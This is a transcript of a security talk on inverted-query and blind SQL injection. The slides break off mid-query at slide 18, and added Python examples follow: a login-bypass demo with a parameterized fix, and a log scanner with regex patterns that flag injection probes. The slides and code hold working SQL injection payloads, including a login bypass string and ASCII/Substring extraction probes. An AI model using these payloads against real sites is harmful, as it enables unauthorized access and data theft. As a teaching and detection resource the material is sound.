How "·$% developers defeat the web vulnerability scanners - Presentation Transcript

1. How ?¿$·& developers defeat the most famous web vulnerability scanners ...or how to recognize old friends
Chema Alonso, Informática64
José Parada, Microsoft Ibérica

2. Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavy Queries
5.- Conclusions

3. 1.- Introduction

4. SQL Injection is still here among us

5. Web Application Security Consortium: Comparison
http://projects.webappsec.org/Web-Application-Security-Statistics
12.186 sites, 97.554 bugs

6. Need to Improve Automatic Scanning
A manual scan is not always possible:
- Time
- Confidentiality
- Money, money, money...
We need to study new ways of recognizing old-fashioned vulnerabilities in order to improve automatic scanning tools.

7. 2.- Inverted Queries

8. (image slide, no transcript text)

9. Homers, how are they?
- Lazy
- Badly trained
- Poor experience in security stuff
- Don't like working
- Don't like computing
- Don't like coding
- Don't like you!

10. Flanders are left-handed

11. Right
SELECT UID FROM USERS WHERE NAME='V_NAME' AND PASSWORD='V_PASSW';

12. Wrong?
SELECT UID FROM USERS WHERE 'V_NAME'=NAME AND 'V_PASSW'=PASSWORD

13. Login Inverted Query
Select uid From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1
Select uid From users where 'Robert'=name and 'Kubica' or '1'='1'=password
FAIL

14. Login Inverted SQL Injection: an example
Select uid From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica
Select uid From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password
Success

15. Blind Attacks
The attacker injects code but cannot access the data directly. However, the injection changes the behaviour of the web application. The attacker then looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
- Blind SQL Injection
- Blind XPath Injection
- Blind LDAP Injection

16. Blind SQL Injection Attacks
The attacker injects:
- "True where clauses"
- "False where clauses"
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
The program does not return any visible data from the database, nor any data in error messages. The attacker cannot see any data extracted from the database.

17. Blind SQL Injection Attacks
The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page":
- Different hashes
- Different HTML structure
- Different patterns (keywords)
- Different linear ASCII sums
- "Different behaviour", for example: response time

18. Blind SQL Injection Attacks
If any difference exists, then the attacker can extract all the information from the database. How? Using "booleanization":
MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
"True-Answer Page" or "False-Answer Page"?
MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
Oracle: Program.php?id=1 and 100>(Select ASCII(Sub
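To make slides 11 to 14 concrete from the code-review side, here is an added Python example; it is not code from the talk or its authors. It builds the "right" and the "inverted" login queries by string concatenation, as the slides show, plus a third version of the inverted query that binds the values as parameters. It assumes an in-memory SQLite table named users with one constructed account (the password "correct-horse-battery" is made up), and uses the two v_pass values shown on slides 13 and 14. The outcome is the point of the talk: the classic payload bypasses the classic query but fails against the inverted one, so a scanner that only sends the classic payload reports the inverted query as safe, while the inverted payload bypasses it just the same. Binding the parameters refuses both, which is the fix a reviewer should ask for regardless of which side of the comparison the literal sits on.

```python
import sqlite3

# Constructed demo account (not from the slides): the attacker does not know this password.
DEMO_USER = ("Robert", "correct-horse-battery")

# The raw v_pass values from slides 13 and 14, exactly as the URL would deliver them.
CLASSIC_PAYLOAD = "Kubica' or '1'='1"
INVERTED_PAYLOAD = "'='' or '1'='1' or 'Kubica"


def make_db():
    """In-memory SQLite database standing in for the users table of the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users (uid, name, password) VALUES (1, ?, ?)", DEMO_USER)
    conn.commit()
    return conn


def _run(conn, sql):
    """Execute a concatenated query; a syntax error caused by the input counts as a refused login."""
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_classic_concat(conn, v_name, v_pass):
    """Vulnerable: the 'Right' query of slide 11, literal on the right, built by concatenation."""
    return _run(conn, f"SELECT uid FROM users WHERE name='{v_name}' AND password='{v_pass}'")


def login_inverted_concat(conn, v_name, v_pass):
    """Vulnerable: the inverted query of slide 12, literal on the left, still concatenated."""
    return _run(conn, f"SELECT uid FROM users WHERE '{v_name}'=name AND '{v_pass}'=password")


def login_inverted_param(conn, v_name, v_pass):
    """Hardened: same inverted shape, but the user input is bound as parameters."""
    row = conn.execute(
        "SELECT uid FROM users WHERE ?=name AND ?=password", (v_name, v_pass)
    ).fetchone()
    return row[0] if row else None


def demo():
    """Return the login outcome of each combination: the uid on success, None when refused."""
    conn = make_db()
    return {
        "classic_query/classic_payload": login_classic_concat(conn, "Robert", CLASSIC_PAYLOAD),
        "inverted_query/classic_payload": login_inverted_concat(conn, "Robert", CLASSIC_PAYLOAD),
        "inverted_query/inverted_payload": login_inverted_concat(conn, "Robert", INVERTED_PAYLOAD),
        "param_query/classic_payload": login_inverted_param(conn, "Robert", CLASSIC_PAYLOAD),
        "param_query/inverted_payload": login_inverted_param(conn, "Robert", INVERTED_PAYLOAD),
        "param_query/real_password": login_inverted_param(conn, *DEMO_USER),
    }


if __name__ == "__main__":
    for case, uid in demo().items():
        print(f"{case:34s} -> {'bypassed, uid=' + str(uid) if uid else 'login refused'}")
```

The only combination where the attacker-controlled text never reaches the parser as SQL is the parameterized one, which is why the comparison direction is irrelevant to the fix: SQLite evaluates `'Kubica' or '1'='1'=password` as `('Robert'=name AND 'Kubica') OR (('1'='1')=password)`, which is false, so the classic probe produces the same refused login as a harmless wrong password and the scanner learns nothing.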
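Slides 16 to 18 describe the request pairs a blind attack sends (a "true where clause" next to a "false where clause") and the ASCII(Substring(...)) booleanization that follows once a difference is found. From the defender's side those requests are the signal to hunt for in the access log. The following added Python script (my own example, not part of the talk) parses a few constructed combined-format log lines, percent-decodes the query parameters, flags true/false probe pairs and character-extraction probes per client and path, and reports whether the true and false responses differed in size, which is exactly the difference slide 17 says the attacker looks for. The log lines, IP addresses and sizes are all made up for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); not real traffic and not from the slides.
# Client 10.0.0.5 sends a baseline request, a true probe, a false probe and a booleanization
# probe against /program.php; client 10.0.0.9 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /program.php?id=1 HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /program.php?id=1%20and%201%3D1 HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /program.php?id=1%20and%201%3D2 HTTP/1.1" 200 4870
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /program.php?id=1%20and%20100%3E(ASCII(Substring(user(),1,1))) HTTP/1.1" 200 5123
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /program.php?id=2 HTTP/1.1" 200 5211
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+|-)'
)

# Signatures for the probes described on the slides, matched against decoded parameter values.
PROBE_PATTERNS = {
    # "and 1=1": a number compared with itself, always true
    "boolean_true": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I),
    # "and 1=2": a number compared with a different number, always false
    "boolean_false": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*(?!\2\b)\d+\b", re.I),
    # booleanization: one character at a time through ASCII(SUBSTRING(...))
    "char_extract": re.compile(r"ascii\s*\(\s*substr(ing)?\s*\(", re.I),
}


def parse_line(line):
    """Split one log line into client IP, request path, decoded query parameters and response size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    size = m.group("size")
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "params": parse_qsl(parts.query, keep_blank_values=True),  # percent-decodes the values
        "status": int(m.group("status")),
        "size": int(size) if size != "-" else None,
    }


def classify_params(params):
    """Return the set of probe labels found in any decoded parameter value."""
    hits = set()
    for _, value in params:
        for label, pattern in PROBE_PATTERNS.items():
            if pattern.search(value):
                hits.add(label)
    return hits


def detect(log_text):
    """Group probes per (client, path). A true/false pair on the same path is the blind-injection
    signature; differing response sizes for the two probes is the difference the attacker needs."""
    seen = defaultdict(lambda: {"labels": set(), "sizes": {}})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify_params(rec["params"])
        if not hits:
            continue
        entry = seen[(rec["ip"], rec["path"])]
        entry["labels"] |= hits
        for label in hits:
            entry["sizes"][label] = rec["size"]

    findings = []
    for (ip, path), entry in seen.items():
        pair = {"boolean_true", "boolean_false"} <= entry["labels"]
        differs = pair and entry["sizes"]["boolean_true"] != entry["sizes"]["boolean_false"]
        findings.append({
            "ip": ip,
            "path": path,
            "probes": sorted(entry["labels"]),
            "boolean_pair": pair,
            "response_size_differs": differs,
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Matching on decoded values rather than the raw URL matters because the probes arrive percent-encoded, and keying on client plus path is what turns two individually unremarkable requests into the pair the slides describe; the response-size comparison is the cheapest of the "difference" signals of slide 17 to recompute from a log, since hashes and HTML structure require the response bodies.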